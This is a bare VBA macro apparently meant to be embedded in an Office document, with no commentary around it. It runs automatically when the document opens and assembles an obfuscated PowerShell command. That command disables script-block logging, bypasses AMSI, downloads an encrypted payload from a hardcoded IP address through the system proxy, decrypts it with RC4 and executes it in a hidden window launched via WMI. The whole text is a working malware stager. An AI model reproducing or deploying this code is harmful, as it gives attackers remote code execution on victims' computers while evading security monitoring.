Sub Auto_Open()
	SsK
End Sub

Sub AutoOpen()
	SsK
End Sub

Sub Document_Open()
	SsK
End Sub

Public Function SsK() As Variant
	Dim VNki As String
	VNki = "CMD  /C   "set  VrOS=   ${I01G}  =  [tyPe]("{14}{0"
	VNki = VNki + "}{3}{1}{12}{8}{4}{6}{2}{7}{9}{5}{10}{11}{13}"-f'o'"
	VNki = VNki + ",'ONs','a','lLEcTI','io','rINg,syStE','n','rY[S','"
	VNki = VNki + "nerIc.DiCT','T','m','.ob','.gE','jECt','C'); SEt  "
	VNki = VNki + "("u"+"ax18") (  [TYPe]("{1}{2}{3}{0}" -F'k','ScRI'"
	VNki = VNki + ",'p','tBlOc'));   sET-variAblE  ("13vMG"+"h") ( [T"
	VNki = VNki + "YPE]("{1}{0}" -f'f','re')  ); Sv  SMX4  ( [tyPe](""
	VNki = VNki + "{0}{4}{3}{1}{2}{5}" -f'Syst','Et.SerVIcePOi','NtmA"
	VNki = VNki + "n','n','Em.','AgeR') ); ${0`K6}=  [tYPE]("{4}{5}{2"
	VNki = VNki + "}{0}{1}{3}"-F'EbR','E','w','QuesT','SYsT','Em.NeT."
	VNki = VNki + "') ;sv  ('2IE'+'Kl') (  [tyPe]("{2}{7}{1}{6}{5}{4}"
	VNki = VNki + "{0}{3}" -F'redENtial','TeM.n','sY','cACHE','.c','t"
	VNki = VNki + "','e','s'));   seT-itEM ('Va'+'riaBL'+'e'+':I52X')"
	VNki = VNki + "  (  [TyPe]("{3}{1}{0}{2}" -f'Xt.eNCODIn','.TE','G"
	VNki = VNki + "','SySTEm')); If(${psV`ErSi`o`N`TaBLE}."P`S`VeRSio"
	VNki = VNki + "N"."MA`jor" -gE 3){${G`PF}= ${13V`MgH}."aSS`EMBly""
	VNki = VNki + ".("{1}{2}{0}" -f'TyPe','G','ET').Invoke(("{1}{2}{4"
	VNki = VNki + "}{7}{0}{3}{5}{6}" -f 'ut','System.Man','ag','omati"
	VNki = VNki + "o','ement.','n.Util','s','A'))."GEtFiE`LD"(("{0}{2"
	VNki = VNki + "}{4}{3}{1}" -f'cache','s','dGroupPolicySett','g','"
	VNki = VNki + "in'),'N'+("{3}{0}{2}{1}"-f 'i','ic','c,Stat','onPu"
	VNki = VNki + "bl'));If(${G`pF}){${G`pC}=${G`pf}.("{0}{2}{1}" -f "
	VNki = VNki + "'GeTV','LuE','A').Invoke(${nU`Ll});If(${G`pc}[("{1"
	VNki = VNki + "}{0}{2}"-f'c','S','riptB')+("{2}{1}{0}" -f 'ing','"
	VNki = VNki + "gg','lockLo')]){${g`pC}[("{2}{1}{0}" -f'B','ipt','"
	VNki = VNki + "Scr')+("{0}{1}{2}" -f 'l','ockLoggi','ng')][("{0}{"
	VNki = VNki + "1}{2}" -f'EnableScri','pt','B')+("{0}{2}{1}{3}"-f "
	VNki = VNki + "'lo','ggin','ckLo','g')]=0;${g`pc}[("{1}{2}{0}" -f"
	VNki = VNki + "'tB','Scri','p')+("{2}{0}{1}"-f 'oggin','g','lockL"
	VNki = VNki + "')][("{3}{5}{0}{2}{4}{1}" -f 'lock','g','Invoca','"
	VNki = VNki + "EnableSc','tionLoggin','riptB')]=0}${v`AL}=  (GeT-"
	VNki = VNki + "VARiaBle I01G -Va )::("{0}{1}"-f'n','ew').Invoke()"
	VNki = VNki + ";${v`Al}.("{0}{1}" -f 'Ad','d').Invoke(("{0}{1}{2}"
	VNki = VNki + "" -f 'Enab','le','ScriptB')+("{1}{0}{3}{2}" -f 'kL"
	VNki = VNki + "o','loc','ging','g'),0);${V`AL}.("{0}{1}"-f 'Ad','"
	VNki = VNki + "d').Invoke(("{5}{1}{8}{10}{9}{4}{0}{6}{7}{2}{3}"-f"
	VNki = VNki + "'vo','e','o','gging','lockIn','Enabl','cati','onL'"
	VNki = VNki + ",'Scri','tB','p'),0);${g`pc}[((("{16}{17}{10}{3}{1"
	VNki = VNki + "1}{19}{20}{5}{22}{1}{15}{2}{8}{18}{4}{0}{12}{6}{9}"
	VNki = VNki + "{13}{7}{21}{14}"-f 'pWind','i','pMi','INErgpSoft',"
	VNki = VNki + "'g','Pol','Shel','S','crosof','lr','_LOCAL_MACH','"
	VNki = VNki + "wa','owsrgpPower','gp','B','esrg','HK','EY','tr','"
	VNki = VNki + "re','rgp','cript','ic')).("{0}{1}"-f 'rE','pLacE')"
	VNki = VNki + ".Invoke('rgp','\'))+("{0}{1}{2}" -f'l','ock','Logg"
	VNki = VNki + "ing')]=${V`Al}}ElSE{  (VArIaBLe ("u"+"Ax18")  -VAL"
	VNki = VNki + "UeoNl )."GeTFiE`ld"(("{1}{2}{3}{0}"-f's','sig','na"
	VNki = VNki + "','ture'),'N'+("{0}{1}{2}{3}" -f 'onPu','bli','c,S"
	VNki = VNki + "','tatic')).("{0}{1}" -f 'SetVAL','Ue').Invoke(${N"
	VNki = VNki + "u`ll},(.("{0}{2}{1}" -f 'Ne','T','W-ObjEC') ("{4}{"
	VNki = VNki + "5}{8}{7}{6}{1}{9}{0}{2}{3}" -f'n','NeRIC.HasHSE','"
	VNki = VNki + "G',']','Colle','CtiONs','E','G','.','t[STri')))} ("
	VNki = VNki + "geT-IteM  ("vAR"+"iaBle:"+"1"+"3VmGH")  ).VAluE."A"
	VNki = VNki + "s`S`EMBLY".("{2}{1}{0}"-f 'pe','tTy','Ge').Invoke("
	VNki = VNki + "("{4}{0}{10}{1}{6}{11}{5}{9}{3}{8}{2}{7}"-f 'em.',"
	VNki = VNki + "'n','i','on.AmsiU','Syst','nt.Au','age','ls','t','"
	VNki = VNki + "tomati','Ma','me'))^|.('?'){${_}}^|.('%'){${_}.("{"
	VNki = VNki + "0}{1}{2}" -f'GETF','IEL','d').Invoke(("{0}{2}{1}"-"
	VNki = VNki + "f'a','Failed','msiInit'),("{3}{0}{4}{5}{1}{2}" -f "
	VNki = VNki + "'nPu',',Stat','ic','No','bl','ic')).("{0}{1}{2}"-f"
	VNki = VNki + "'Se','TV','aLue').Invoke(${n`ULl},${TR`Ue})};}; ${"
	VNki = VNki + "sm`X4}::"EXpe`cT100Con`TiNuE"=0;${wC}=^&("{1}{2}{3"
	VNki = VNki + "}{0}" -f'eCT','NeW-','O','BJ') ("{3}{2}{1}{0}" -f "
	VNki = VNki + "'Ent','StEM.NeT.WEBCLi','Y','S');${U}=("{7}{12}{8}"
	VNki = VNki + "{0}{3}{9}{18}{16}{10}{2}{14}{6}{15}{4}{17}{11}{1}{"
	VNki = VNki + "5}{13}" -f'a/5','k','r','.0 (','v:11','e Ge','/7.0"
	VNki = VNki + "','M','zill','Wi','T','li','o','cko','ident','; r'"
	VNki = VNki + ",'NT 6.1; WOW64; ','.0) ','ndows ');${wc}."hea`d`E"
	VNki = VNki + "RS".("{0}{1}"-f'A','DD').Invoke(("{2}{0}{1}"-f'er-"
	VNki = VNki + "A','gent','Us'),${U});${WC}."Pr`OXy"= (  gET-VARIA"
	VNki = VNki + "BlE  ('0K'+'6')).vAlUE::"dEFAu`LT`Webpro`xY";${wC}"
	VNki = VNki + "."P`ROXy"."CReDe`NTIa`Ls" =   (item ('vARIabL'+'e:"
	VNki = VNki + "2'+'Ie'+'kl')).ValUE::"DEfAU`LT`NetWOrk`creDE`NtIA"
	VNki = VNki + "LS";${S`C`Ript:pRO`Xy} = ${W`c}."P`RoXY";${k}= ${i"
	VNki = VNki + "5`2X}::"AsC`Ii".("{1}{2}{0}" -f'ES','GETBY','t').I"
	VNki = VNki + "nvoke(("{0}{4}{3}{1}{5}{2}" -f'5','674c9','b8f0','"
	VNki = VNki + "6786','d99d298a3d676','dbd61'));${R}={${d},${k}=${"
	VNki = VNki + "ar`gS};${s}=0..255;0..255^|.('%'){${J}=(${j}+${S}["
	VNki = VNki + "${_}]+${K}[${_}%${K}."cou`Nt"])%256;${S}[${_}],${s"
	VNki = VNki + "}[${j}]=${S}[${J}],${s}[${_}]};${D}^|^&('%'){${I}="
	VNki = VNki + "(${I}+1)%256;${h}=(${h}+${s}[${i}])%256;${S}[${I}]"
	VNki = VNki + ",${s}[${h}]=${S}[${H}],${s}[${i}];${_}-BxOR${S}[($"
	VNki = VNki + "{S}[${I}]+${s}[${h}])%256]}};${s`Er}=("{3}{0}{4}{6"
	VNki = VNki + "}{7}{5}{2}{1}" -f'tp:/','43','29:4','ht','/99.','9"
	VNki = VNki + ".1','2','43.22');${T}=("{2}{1}{0}" -f 's.php','w',"
	VNki = VNki + "'/ne');${W`C}."h`eA`dERs".("{0}{1}" -f 'AD','d').I"
	VNki = VNki + "nvoke(("{0}{1}"-f 'C','ookie'),("{1}{8}{9}{6}{7}{0"
	VNki = VNki + "}{3}{10}{2}{5}{4}"-f 'p','session=','eEFHDXS','Xaw"
	VNki = VNki + "AU','=','HV4','9/','m8S','P+','fX','UO'));${D`ATA}"
	VNki = VNki + "=${wc}.("{1}{3}{2}{0}"-f 'lOADDATa','Do','N','w')."
	VNki = VNki + "Invoke(${S`eR}+${T});${I`V}=${D`AtA}[0..3];${D`ATa"
	VNki = VNki + "}=${DA`Ta}[4..${DA`TA}."LENg`TH"];-JoiN[ChAr[]](^&"
	VNki = VNki + " ${R} ${d`Ata} (${I`V}+${k}))^|.("{1}{0}"-f'X','IE"
	VNki = VNki + "')&& sEt   upSF=ECHo (gci VArIabLE:e*TeX*).VaLuE.I"
	VNki = VNki + "NvoKeCoMmaND.invoKEscRIpT(([ENvIrONmenT]::gETENViR"
	VNki = VNki + "ONmenTvAriabLe('vROs','pRocEsS'))  ) ^|  POwERsHEL"
	VNki = VNki + "L -nOPrOFi  -windOw  HiddEN -exECu bypasS  -NOE  -"
	VNki = VNki + "NoNintErACTi    -  && CMD  /C %uPSf%""
	Const HIDDEN_WINDOW = 0
	strComputer = "."
	Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
	Set objStartup = objWMIService.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	objConfig.ShowWindow = HIDDEN_WINDOW
	Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
	objProcess.Create VNki, Null, objConfig, intProcessID
End Function
